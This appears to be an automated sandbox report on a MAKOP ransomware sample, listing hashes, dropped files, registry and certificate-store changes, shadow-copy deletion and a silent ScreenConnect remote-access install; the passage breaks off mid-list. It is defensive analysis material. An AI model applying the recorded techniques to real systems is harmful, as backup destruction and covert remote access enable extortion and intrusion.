Analysis
-
max time kernel
125s -
max time network
121s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
26-12-2021 05:07
Static task
static1
Behavioral task
behavioral1
Sample
c540c9b5b467d575f46433b78237f6e1.exe
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
General
-
Target
c540c9b5b467d575f46433b78237f6e1.exe
-
Size
109KB
-
MD5
c540c9b5b467d575f46433b78237f6e1
-
SHA1
93dd622dc1268f598a47fe7c75efbce355097b98
-
SHA256
5f5d1f324ed8dc18d76f200a176d40ab2ae48e336f33c2f7b5d047d682f3260a
-
SHA512
29776896e4e5eef318389c3b618afe1a1ccb83e4eb41c42bcb108576a50953d760696bcf7531331678e00284a2d0320dba553070a2e0cc3bd7896802e82c9190
Malware Config
Signatures
-
MAKOP ransomware payload 4 IoCs
resource yara_rule behavioral1/files/0x000400000000b1f2-122.dat family_makop behavioral1/files/0x000400000000b1f2-123.dat family_makop behavioral1/files/0x000400000000b1f2-125.dat family_makop behavioral1/files/0x000400000000b1f2-127.dat family_makop -
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 924 wbadmin.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 2004 MpResult.exe 1080 SA.exe 1536 SA.exe 2072 ScreenConnect.ClientService.exe 2260 ScreenConnect.WindowsClient.exe 2336 ScreenConnect.WindowsClient.exe -
Loads dropped DLL 31 IoCs
pid Process 864 c540c9b5b467d575f46433b78237f6e1.exe 864 c540c9b5b467d575f46433b78237f6e1.exe 864 c540c9b5b467d575f46433b78237f6e1.exe 1900 MsiExec.exe 1972 rundll32.exe 1972 rundll32.exe 1972 rundll32.exe 1972 rundll32.exe 1972 rundll32.exe 1972 rundll32.exe 1972 rundll32.exe 588 MsiExec.exe 588 MsiExec.exe 588 MsiExec.exe 1184 MsiExec.exe 1184 MsiExec.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Drops file in Program Files directory 10 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\system.config msiexec.exe -
Drops file in Windows directory 22 IoCs
description ioc Process File opened for modification C:\Windows\tasks\0.msi SA.exe File opened for modification C:\Windows\tasks\SCHEDLGU.TXT SA.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI71F6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI72A3.tmp msiexec.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File created C:\Windows\tasks\SA.exe c540c9b5b467d575f46433b78237f6e1.exe File opened for modification C:\Windows\Installer\MSI71E5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI766D.tmp msiexec.exe File opened for modification C:\Windows\Installer\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\f776d06.ipi msiexec.exe File created C:\Windows\tasks\MpResult.exe c540c9b5b467d575f46433b78237f6e1.exe File created C:\Windows\Installer\f776d06.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI72F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI76FA.tmp msiexec.exe File opened for modification C:\Windows\tasks\SA.DAT SA.exe File created C:\Windows\Installer\f776d05.msi msiexec.exe File opened for modification C:\Windows\Installer\f776d05.msi msiexec.exe File created C:\Windows\Installer\wix{31314284-FC97-490C-B2FF-1BC5FB44A2BF}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\f776d08.msi msiexec.exe File created C:\Windows\Installer\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\DefaultIcon msiexec.exe File created C:\Windows\tasks\0.msi c540c9b5b467d575f46433b78237f6e1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1476 2004 WerFault.exe 49 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1076 timeout.exe 1284 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ScreenConnect.WindowsClient.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1616 vssadmin.exe -
Modifies data under HKEY_USERS 9 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.WindowsClient.exe -
Modifies registry class 32 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\2F98838601EBB89E3213AEBCB4460E41 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (2331eacb4b64e014)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Version = "353244964" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\LastUsedSource = "n;1;C:\\Windows\\tasks\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\4824131379CFC0942BFFB15CBF442AFB msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-2331eacb4b64e014\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\2F98838601EBB89E3213AEBCB4460E41\4824131379CFC0942BFFB15CBF442AFB msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\PackageCode = "7047F9C0F930AC34A8A537D2CE48D500" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\PackageName = "0.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-2331eacb4b64e014 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\ProductIcon = "C:\\Windows\\Installer\\{31314284-FC97-490C-B2FF-1BC5FB44A2BF}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Net msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-2331eacb4b64e014\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\4824131379CFC0942BFFB15CBF442AFB\Full msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\ProductName = "ScreenConnect Client (2331eacb4b64e014)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4824131379CFC0942BFFB15CBF442AFB\SourceList\Net\1 = "C:\\Windows\\tasks\\" msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 c540c9b5b467d575f46433b78237f6e1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a c540c9b5b467d575f46433b78237f6e1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a c540c9b5b467d575f46433b78237f6e1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a c540c9b5b467d575f46433b78237f6e1.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 1988 powershell.exe 1560 powershell.exe 308 powershell.exe 1736 powershell.exe 1732 powershell.exe 1968 powershell.exe 432 powershell.exe 1692 powershell.exe 1888 powershell.exe 1080 powershell.exe 1720 powershell.exe 1136 powershell.exe 1476 WerFault.exe 1476 WerFault.exe 1476 WerFault.exe 1476 WerFault.exe 1476 WerFault.exe 1080 SA.exe 692 msiexec.exe 692 msiexec.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe 2072 ScreenConnect.ClientService.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 864 c540c9b5b467d575f46433b78237f6e1.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 308 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 1476 WerFault.exe Token: SeBackupPrivilege 840 vssvc.exe Token: SeRestorePrivilege 840 vssvc.exe Token: SeAuditPrivilege 840 vssvc.exe Token: SeShutdownPrivilege 1412 msiexec.exe Token: SeIncreaseQuotaPrivilege 1412 msiexec.exe Token: SeRestorePrivilege 692 msiexec.exe Token: SeTakeOwnershipPrivilege 692 msiexec.exe Token: SeSecurityPrivilege 692 msiexec.exe Token: SeCreateTokenPrivilege 1412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1412 msiexec.exe Token: SeLockMemoryPrivilege 1412 msiexec.exe Token: SeIncreaseQuotaPrivilege 1412 msiexec.exe Token: SeMachineAccountPrivilege 1412 msiexec.exe Token: SeTcbPrivilege 1412 msiexec.exe Token: SeSecurityPrivilege 1412 msiexec.exe Token: SeTakeOwnershipPrivilege 1412 msiexec.exe Token: SeLoadDriverPrivilege 1412 msiexec.exe Token: SeSystemProfilePrivilege 1412 msiexec.exe Token: SeSystemtimePrivilege 1412 msiexec.exe Token: SeProfSingleProcessPrivilege 1412 msiexec.exe Token: SeIncBasePriorityPrivilege 1412 msiexec.exe Token: SeCreatePagefilePrivilege 1412 msiexec.exe Token: SeCreatePermanentPrivilege 1412 msiexec.exe Token: SeBackupPrivilege 1412 msiexec.exe Token: SeRestorePrivilege 1412 msiexec.exe Token: SeShutdownPrivilege 1412 msiexec.exe Token: SeDebugPrivilege 1412 msiexec.exe Token: SeAuditPrivilege 1412 msiexec.exe Token: SeSystemEnvironmentPrivilege 1412 msiexec.exe Token: SeChangeNotifyPrivilege 1412 msiexec.exe Token: SeRemoteShutdownPrivilege 1412 msiexec.exe Token: SeUndockPrivilege 1412 msiexec.exe Token: SeSyncAgentPrivilege 1412 msiexec.exe Token: SeEnableDelegationPrivilege 1412 msiexec.exe Token: SeManageVolumePrivilege 1412 msiexec.exe Token: SeImpersonatePrivilege 1412 msiexec.exe Token: SeCreateGlobalPrivilege 1412 msiexec.exe Token: SeCreateTokenPrivilege 1412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1412 msiexec.exe Token: SeLockMemoryPrivilege 1412 msiexec.exe Token: SeIncreaseQuotaPrivilege 1412 msiexec.exe Token: SeMachineAccountPrivilege 1412 msiexec.exe Token: SeTcbPrivilege 1412 msiexec.exe Token: SeSecurityPrivilege 1412 msiexec.exe Token: SeTakeOwnershipPrivilege 1412 msiexec.exe Token: SeLoadDriverPrivilege 1412 msiexec.exe Token: SeSystemProfilePrivilege 1412 msiexec.exe Token: SeSystemtimePrivilege 1412 msiexec.exe Token: SeProfSingleProcessPrivilege 1412 msiexec.exe Token: SeIncBasePriorityPrivilege 1412 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1412 msiexec.exe 1412 msiexec.exe 2260 ScreenConnect.WindowsClient.exe 2260 ScreenConnect.WindowsClient.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2260 ScreenConnect.WindowsClient.exe 2260 ScreenConnect.WindowsClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 864 wrote to memory of 1656 864 c540c9b5b467d575f46433b78237f6e1.exe 28 PID 864 wrote to memory of 1656 864 c540c9b5b467d575f46433b78237f6e1.exe 28 PID 864 wrote to memory of 1656 864 c540c9b5b467d575f46433b78237f6e1.exe 28 PID 864 wrote to memory of 1656 864 c540c9b5b467d575f46433b78237f6e1.exe 28 PID 1656 wrote to memory of 432 1656 cmd.exe 30 PID 1656 wrote to memory of 432 1656 cmd.exe 30 PID 1656 wrote to memory of 432 1656 cmd.exe 30 PID 1656 wrote to memory of 432 1656 cmd.exe 30 PID 432 wrote to memory of 2016 432 cmd.exe 31 PID 432 wrote to memory of 2016 432 cmd.exe 31 PID 432 wrote to memory of 2016 432 cmd.exe 31 PID 432 wrote to memory of 2016 432 cmd.exe 31 PID 1656 wrote to memory of 2004 1656 cmd.exe 32 PID 1656 wrote to memory of 2004 1656 cmd.exe 32 PID 1656 wrote to memory of 2004 1656 cmd.exe 32 PID 1656 wrote to memory of 2004 1656 cmd.exe 32 PID 1656 wrote to memory of 1988 1656 cmd.exe 33 PID 1656 wrote to memory of 1988 1656 cmd.exe 33 PID 1656 wrote to memory of 1988 1656 cmd.exe 33 PID 1656 wrote to memory of 1988 1656 cmd.exe 33 PID 1656 wrote to memory of 1208 1656 cmd.exe 34 PID 1656 wrote to memory of 1208 1656 cmd.exe 34 PID 1656 wrote to memory of 1208 1656 cmd.exe 34 PID 1656 wrote to memory of 1208 